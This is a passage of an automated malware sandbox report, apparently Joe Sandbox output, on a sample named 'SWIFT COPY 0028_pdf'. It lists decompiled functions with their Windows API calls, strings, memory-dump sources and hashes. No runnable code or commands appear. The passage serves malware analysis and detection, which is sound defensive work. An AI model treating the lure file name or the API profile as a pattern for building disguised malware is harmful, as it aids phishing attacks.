                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 009652D5
                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009652F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 9549e87721902a53367a691d40888ae2f3cf219fe987db9600b23f946d79fc91
                                                                                    • Instruction ID: 985bfeb3e13738e085884af1e0efd9c6d403ca3cddb3e113e1ddab9a2803cd70
                                                                                    • Opcode Fuzzy Hash: 9549e87721902a53367a691d40888ae2f3cf219fe987db9600b23f946d79fc91
                                                                                    • Instruction Fuzzy Hash: 2111EF76E01714EBDB20DF98D944F9D77BCAB06B94F060025E912EB2A0D3B0ED44CBA0
                                                                                    Function 00974D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00974DF5
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00974E1E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: e1a2221d7c82d0192db052041b6bad9b6e4c3e9eb3c4438fac9003abf22932dc
                                                                                    • Instruction ID: d8824d756cc17b2108b7074bc72454aba103679b9b2341b7aff613f1cceb5729
                                                                                    • Opcode Fuzzy Hash: e1a2221d7c82d0192db052041b6bad9b6e4c3e9eb3c4438fac9003abf22932dc
                                                                                    • Instruction Fuzzy Hash: 8411A0B2641221BBDB358F51C888FFBFAACFF06765F10C62AF55996181E3706940D6E0
                                                                                    Function 0097A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0097A84E
                                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0097A88B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: htonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 3832099526-2422070025
                                                                                    • Opcode ID: 9fcf27a5dd9b874218ae619821d961902e74a15a7319a9910cee001f9e5efc22
                                                                                    • Instruction ID: 34d3aef418ee73d5c695f3b72120bdc95cdec2088f24aea45b468f47d60fa735
                                                                                    • Opcode Fuzzy Hash: 9fcf27a5dd9b874218ae619821d961902e74a15a7319a9910cee001f9e5efc22
                                                                                    • Instruction Fuzzy Hash: 3D01C0B6200304ABCB20EFA8D886BEDB368EF85314F10C426F61A9B3D1D771E8058752
                                                                                    Function 0095B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0095B7EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 8f4c1209ff3049a3ae874cca02a52997ea311fc06e9f505d71e13b98e65d40be
                                                                                    • Instruction ID: d070a09834e85e8099d31baae9007bf89e302bae71bf5a9d6bf642f3b9cdac2a
                                                                                    • Opcode Fuzzy Hash: 8f4c1209ff3049a3ae874cca02a52997ea311fc06e9f505d71e13b98e65d40be
                                                                                    • Instruction Fuzzy Hash: C401D4B1641128ABCB04EBA4DC52AFE336DBF96350B04061DF862A72D6EB745D0CC7A0
                                                                                    Function 0095B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0095B6EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 5f850b7233ab47b0e8d47530c8f24cacdc9ffe359d373817b550dc7a5a60364e
                                                                                    • Instruction ID: c0135be1c9dd15040988088d19b83092be5ade55a821b063fd92db4f78ff6c4a
                                                                                    • Opcode Fuzzy Hash: 5f850b7233ab47b0e8d47530c8f24cacdc9ffe359d373817b550dc7a5a60364e
                                                                                    • Instruction Fuzzy Hash: 7201FDB1642008ABCB04EBA5D912BFF33AC9F95345F10002AB902B32C6EB945E0C87B5
                                                                                    Function 0095B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0095B76C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: a14c94782b3e9edfa08fa9e8fc78bcf314e98ff818c5534a812f854d223f84ba
                                                                                    • Instruction ID: a8c289be2c222994e4841c9e6c6fb8b35eb2a68c30811f2344d8257976c4407c
                                                                                    • Opcode Fuzzy Hash: a14c94782b3e9edfa08fa9e8fc78bcf314e98ff818c5534a812f854d223f84ba
                                                                                    • Instruction Fuzzy Hash: 1901ADB6641114ABDB00EBA4D902BFE73AC9B99345B10002AB802B3696EB645E0D87B5
                                                                                    Function 00967744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
                                                                                    • Opcode ID: cd0ef7e515f72df6d4d74728f13272fc71ab5c67412e506ed53cbe5f8de9b03c
                                                                                    • Instruction ID: adb40a7462b7eac4aa2b6ddcdb0e83b056629fc62846c7547c2562f49ff0cf2a
                                                                                    • Opcode Fuzzy Hash: cd0ef7e515f72df6d4d74728f13272fc71ab5c67412e506ed53cbe5f8de9b03c
                                                                                    • Instruction Fuzzy Hash: 3BE0927760432467D710AAA5DC4AE8BFBACAB91764F004166B905D3181E660EA4187D0
                                                                                    Function 0095A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0095A63F
                                                                                      • Part of subcall function 009413F1: _doexit.LIBCMT ref: 009413FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message_doexit
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 1993061046-4017498283
                                                                                    • Opcode ID: 7dd05cb5b805b445533c5d67ee40c0aaccc87cadc516f4ca71fcabc30586604f
                                                                                    • Instruction ID: 45e5bf6c028d03c0892d7c7bf56386bd9afbb645054295b045a5f6c25bcc5558
                                                                                    • Opcode Fuzzy Hash: 7dd05cb5b805b445533c5d67ee40c0aaccc87cadc516f4ca71fcabc30586604f
                                                                                    • Instruction Fuzzy Hash: BDD02B313C532833C21036D83C17FC4354C8F95B65F040022BB0C955C24DE2C98002DD
                                                                                    Function 0099AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0099ACC0
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0099AEBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 510247158-3257408948
                                                                                    • Opcode ID: 045655a968c86c3a003ba1835950326491d0698a680655116d067788d7ce4048
                                                                                    • Instruction ID: dfa9d82ff2319362be9f8bd4c4d71fd074cdfe2e91dd11b4064c6af15f937736
                                                                                    • Opcode Fuzzy Hash: 045655a968c86c3a003ba1835950326491d0698a680655116d067788d7ce4048
                                                                                    • Instruction Fuzzy Hash: 9CE06D70C18109EFCF15DBA9D984AECBBBCEF58300F108481E052B6560EB354A84EF62
                                                                                    Function 00988698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009886A2
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009886B5
                                                                                      • Part of subcall function 00967A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 3edecea96aafb6404a78c4dbf9de936d9b5622a6aa42a96349ee883620eded2f
                                                                                    • Instruction ID: 77a6e98d5a6826bcb30314ba4ec51c79e97dc7bc2f6541adc3a0e28a7d3361df
                                                                                    • Opcode Fuzzy Hash: 3edecea96aafb6404a78c4dbf9de936d9b5622a6aa42a96349ee883620eded2f
                                                                                    • Instruction Fuzzy Hash: 82D012317A9314B7F26867B0AC0BFC67A189F45B15F104815B74AAA1D0C9E0E940D794
                                                                                    Function 009886CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009886E2
                                                                                    • PostMessageW.USER32(00000000), ref: 009886E9
                                                                                      • Part of subcall function 00967A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: a8b2c2b83b05b08a375796f905b7a5c30f5a94b551885245c98fd1e13d4a2f8d
                                                                                    • Instruction ID: 058e5300113db417b0dca0dc39e8af8090b81a68db8f86a7a9e00abbd9a68b13
                                                                                    • Opcode Fuzzy Hash: a8b2c2b83b05b08a375796f905b7a5c30f5a94b551885245c98fd1e13d4a2f8d
                                                                                    • Instruction Fuzzy Hash: 21D012317DA3147BF26867B0AC0BFC67A189F45B15F104815B74AEA1D0C9E0E940D795